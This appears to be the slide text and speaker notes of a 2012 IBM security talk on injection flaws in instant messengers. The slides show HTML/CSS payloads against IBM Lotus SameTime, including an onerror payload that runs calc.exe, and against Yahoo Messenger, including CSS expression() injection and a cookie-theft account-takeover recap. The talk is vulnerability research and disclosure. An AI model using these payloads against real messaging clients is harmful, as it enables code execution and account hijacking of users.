  • 4. © 2012 IBM Corporation IBM Security Systems 4 Background - Instant Messengers Every time I’ve seen this screen, I wondered “What if I could use some HTML here…”
  • 5. © 2012 IBM Corporation IBM Security Systems 5 Background - Windows Fonts Windows accepts basically any character as part of the font name Font name length limited to ~30 chars
  • 6. © 2012 IBM Corporation IBM Security Systems 6 IBM Lotus SameTime Messenger <span style="font-size:14pt;font-family:Segoe UI; font-weight:normal;font-style:normal;">You Do!</span>
  • 7. © 2012 IBM Corporation IBM Security Systems 7 SameTime - Exploit - CSS Font Name: expression(alert(1));
  • 8. © 2012 IBM Corporation IBM Security Systems 8 SameTime - Exploit - CSS Font Name: expression(alert(1)); Desired output: <span style= ";font-family:expression(alert(1));…"> Actual output: <span style="">
  • 9. © 2012 IBM Corporation IBM Security Systems 9 SameTime - Exploit - New Attribute Font Name: "onclick="alert(1)" Desired output: <span style="font-size:9pt;font-family:“ onclick="alert(1)" ..."> Actual output: <span style="font-size:9pt;font-family:" onclick="">
  • 10. © 2012 IBM Corporation IBM Security Systems 10 SameTime - Exploit ~50 Fonts Later
  • 11. © 2012 IBM Corporation IBM Security Systems 11 SameTime - Exploit - Found Message sent: <span style=“…font-family: Message Received: <span style=“…font-family:
  • 12. © 2012 IBM Corporation IBM Security Systems 12 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='> Message Received: <span style=“…font-family:
  • 13. © 2012 IBM Corporation IBM Security Systems 13 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='> Message Received: <span style=“…font-family:e0”> <img x='>
  • 14. © 2012 IBM Corporation IBM Security Systems 14 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='>Rest of Orig CSS"> Message Received: <span style=“…font-family:e0”> <img x='>Rest of Orig CSS">
  • 15. © 2012 IBM Corporation IBM Security Systems 15 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='>Rest of Orig CSS">' src='x' onerror='location="c:windowssystem32calc.exe" ' Message Received: <span style=“…font-family:e0”> <img x='>Rest of Orig CSS">
  • 16. © 2012 IBM Corporation IBM Security Systems 16 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='>Rest of Orig CSS">' src='x' onerror='location="c:windowssystem32calc.exe" ' </span> Message Received: <span style=“…font-family:e0”> <img x='>Rest of Orig CSS">' src='x' onerror='location="c:windowssystem32calc.exe" ' </span>
  • 17. © 2012 IBM Corporation IBM Security Systems 17 SameTime – Remote Code Execution <span style="font-size:14pt;font-family:e0"> <img x=';font-weight:normal;font-style:normal;">' src='x' onerror='location="c:windowssystem32calc.exe"'</span>
  • 18. © 2012 IBM Corporation IBM Security Systems 18 Yahoo Messenger
  • 19. © 2012 IBM Corporation IBM Security Systems 19 Yahoo Messenger – Message View Lots of Colors, but that’s about it…
  • 20. © 2012 IBM Corporation IBM Security Systems 20 Yahoo Messenger - History View
  • 21. © 2012 IBM Corporation IBM Security Systems 21 Yahoo Messenger - History View
  • 22. © 2012 IBM Corporation IBM Security Systems 22 Yahoo Messenger - History View Finally, Yahoo's purple alert!
  • 23. © 2012 IBM Corporation IBM Security Systems 23 Yahoo Messenger - The Payload <img src="x"onmouseover="alert(1)">
  • 24. © 2012 IBM Corporation IBM Security Systems 24 Yahoo Messenger - Digging Deeper Wait, what? It's not local?!
  • 25. © 2012 IBM Corporation IBM Security Systems 25 Yahoo Messenger - Digging Deeper Accessing this URL in Chrome, yields the same result.
  • 26. © 2012 IBM Corporation IBM Security Systems 26 Yahoo Messenger - Digging Deeper That means I can read the cookie! And steal your account!
  • 27. © 2012 IBM Corporation IBM Security Systems 27 Yahoo Messenger - Recap 1. Send the victim a message that contain malicious HTML snippet 2. Wait 3-4 hours for it to show up in the history 3. Convince the user to access his history or send him a direct link to it (after all, it not local) 4. Have the victim click the Instant Message from the drop-down box
  • 28. © 2012 IBM Corporation IBM Security Systems 28 Yahoo Messenger - Introducing: Web Messenger! Finally I can see the results of my attacks in real time!
  • 29. © 2012 IBM Corporation IBM Security Systems 29 Yahoo Messenger - Web Messenger During the tests, I noticed that a <Font> tag sent as part of the message text, is being rendered differently in the Web Messenger. • The message: <font face="xxx" size="20">33333</font> • Was rendered as: <font style="font-size:20pt" face="xxx“ id="yui_3_2_0_20_1330267588862427">33333</font>
  • 30. © 2012 IBM Corporation IBM Security Systems 30 Yahoo Messenger - Exploiting CSS Add a new rule with an expression() call.
  • 31. © 2012 IBM Corporation IBM Security Systems 31 Yahoo Messenger - Exploiting CSS Started With: <font face=ssss size="1&color:red">xxxx</font> To my surprise the response came back as I hoped <font style="font-size:1&amp;color:red" >xxxx</font>
  • 32. © 2012 IBM Corporation IBM Security Systems 32 Yahoo Messenger - Exploiting CSS Next was the expression: <font face=sssss size="1&color:expression(alert(1))" >xxxx</font> And again, it seems like nothing is filtering this... <font style="font-size:1&amp;color:expression(alert(1))" >xxxx</font>
  • 33. © 2012 IBM Corporation IBM Security Systems 33 Yahoo Messenger - Exploiting CSS Time to open Internet Explorer!
  • 34. © 2012 IBM Corporation IBM Security Systems 34 Yahoo Web Messenger - IE Version
  • 35. © 2012 IBM Corporation IBM Security Systems 35 Yahoo Web Messenger - IE Version The Rules (for IE): 1. The Size attribute must be surrounded by double-quotes (" ") 2. The size value must be followed by the "pt;" suffix <font size="15pt;"> <font style="font-size=15pt;">
  • 36. © 2012 IBM Corporation IBM Security Systems 36 Yahoo Web Messenger - IE Version By tweaking the size value, a new Font-Family CSS rule could be injected. <font size="15pt;font-family:aaaa;"> <font style="font-size=15pt;font-family: aaaa;">
  • 37. © 2012 IBM Corporation IBM Security Systems 37 Yahoo Web Messenger - IE Version With all that in mind, and ~30 <Font> tags later, came the following payload that bypass the CSS filtering <font size="15pt;font-family:expression(alert(1));">
  • 38. © 2012 IBM Corporation IBM Security Systems 38 Yahoo Web Messenger - IE Version It should work correctly according to the rendered source in IE Developer Tools
  • 39. © 2012 IBM Corporation IBM Security Systems 39 Yahoo Web Messenger - IE Version Yet somehow, no alert
  • 40. © 2012 IBM Corporation IBM Security Systems 40 Yahoo Web Messenger - Uber Meta! After ~5 hours of more fiddling and long lonely IM chats with myself I finally found out what I was afraid of. Or in other words, The "No Expression For You" Meta Tag <meta http-equiv="X-UA-Compatible" content="IE=8"/>
  • 41. © 2012 IBM Corporation IBM Security Systems 41 Yahoo Web Messenger - Going Old School Fired up my Windows XP VM and kicked out IE8
  • 42. © 2012 IBM Corporation IBM Security Systems 42 Yahoo Web Messenger - Finally
  • 43. © 2012 IBM Corporation IBM Security Systems 43 Yahoo Messenger - History Window
  • 44. © 2012 IBM Corporation IBM Security Systems 44 Questions?

Editor's Notes

  1. Who am I? This presentation is going to show an idea I had and how I leveraged this idea into 3 vulnerabilities in the major IM clients One of which will not be disclosed today due to the fact that it was not yet patched. It will be publish in our blog once it is patched
  2. Explain how IMs work: Talk about: -------------- The message window is actually a browser The users text message is wrapped in HTML\XML template containing the following fields Message is sent to and then rendered as HTML\XML in the clients browser. Accept parameters dictating: color Font name Font weight Font style And more בואו נדבר על IMS ונשים רגע בצד את כל הפונקציונאליות של וידאו, סאונד שליחת קבצים וכו ונשאיר רק את האספקט של שליחת ההודעות. אם ננסה למפות את הדרכים שלנו לשלוח קלט למערכת, נגיע למשהו כמו בדוגמא
  3. Explain how IMs work: Talk about: -------------- The message window is actually a browser The users text message is wrapped in HTML\XML template containing the following fields Message is sent to and then rendered as HTML\XML in the clients browser. Accept parameters dictating: color Font name Font weight Font style And more בואו נדבר על IMS ונשים רגע בצד את כל הפונקציונאליות של וידאו, סאונד שליחת קבצים וכו ונשאיר רק את האספקט של שליחת ההודעות. אם ננסה למפות את הדרכים שלנו לשלוח קלט למערכת, נגיע למשהו כמו בדוגמא
  4. To configure all these setting, these apps usually come with a screen like this one Every time I’ve seen this screen, I wondered “what if I could use some HTML here…”
  5. And apparently, you can! Windows fonts, All Chars are valid Max 30 chars in every font name
  6. Explain that the font we change, goes into this template and then sent out. Talk about possibilities of exploits: 1. Expression 2. Get out to span tag 3. Get out to HTML main context
  7. Starting off with expression
  8. The server actually filtered everything in the CSS
  9. Moving to the next payload, Getting out of the style attr and getting into a new onclick attr Result in the onclick being empty. No good
  10. Two fields attack First field (Font Name): ----------- 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘….. Opens a new IMG tag with X attribute (using a single quot) Second field (Message Text): --------------- 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file 4. File will be executed
  11. Two fields attack First field (Font Name): ----------- 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘….. Opens a new IMG tag with X attribute (using a single quot) Second field (Message Text): --------------- 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file 4. File will be executed
  12. Two fields attack First field (Font Name): ----------- 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘….. Opens a new IMG tag with X attribute (using a single quot) Second field (Message Text): --------------- 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file 4. File will be executed
  13. Two fields attack First field (Font Name): ----------- 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘….. Opens a new IMG tag with X attribute (using a single quot) Second field (Message Text): --------------- 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file 4. File will be executed
  14. Two fields attack First field (Font Name): ----------- 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘….. Opens a new IMG tag with X attribute (using a single quot) Second field (Message Text): --------------- 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file 4. File will be executed
  15. Two fields attack First field (Font Name): ----------- 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘….. Opens a new IMG tag with X attribute (using a single quot) Second field (Message Text): --------------- 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file 4. File will be executed
  16. Second line shows the trapped CSS in the X parameter Calc executed example
  17. Yahoo No History found in local FS, meaning template is unknown Messages sent takes about 3-4 hours till they register in the History That means that every time I wanted to test anything, I have to wait 3-4 for the results and only then tweak my payloads and resend everything…
  18. Message view seems to sanitize input well, All messages sent managed to do nothing more the pretty colors Taking into account the fact that every test take 3 hours, I decided its best to move on and open the history
  19. Looks a bit better but still, nothing interesting…
  20. The next step I took was to change the history filter to “Instant Messages”
  21. Boom Endless pop ups poped up… Apparently a lot of my tests worked…
  22. I isolated the simplest payload that worked and we can now move on and get some info such as: User Agent Privileges Etc…
  23. Digging deeper got us the browser type (IE) And the location of the page, which is an internet address
  24. So I tried accessing this page using chrome, and as long as I was Logged in to Yahoo! It got me to the same results!
  25. The next thing I found was the cookie Apparently, Yahoo don’t like to use HTTP-only cookies, so once stealing the cookie actually means stealing the account!
  26. Send message Wait 3-4h Social engineer the user into opening the History Have the user click on the Instant Messages context menu
  27. No more 3 hours tests I can now send a message and see it on the web messenger immediately I now know the template.
  28. I sent the first line of code The web messenger rendered the second line of code Changes: Added a new ID attribute – We don’t care! Transformed the Size attribute into a CSS Font-Size attribute – Very Interesting!
  29. First, I tried to inject a new color:red sentence Using the & -> &amp; encoding in order to terminate the css rule and inject a new one And that worked without a glitch
  30. Tried the same with an expression call, and all seems well
  31. Opening IE But no alert… After digging a little deeper
  32. Different sanitizer per browser Found an older message that has a similar behavior Worked in that example till I found some guidelines for the transformation on IE
  33. Talk about the two rules of transformation
  34. Using these guidelines I attempted a new rule injection
  35. Payload found – new rule injected Explain the CSS encoding trick
  36. Everything looks good in IE
  37. Somehow, no alert
  38. Goddamn meta tag But this meta tag doesn’t work in IE<8
  39. VM Kick off IE8
  40. Entered the same URL with IE 7 and the alert shows up
  41. Also in the original History view of the messenger which actually uses the installed IE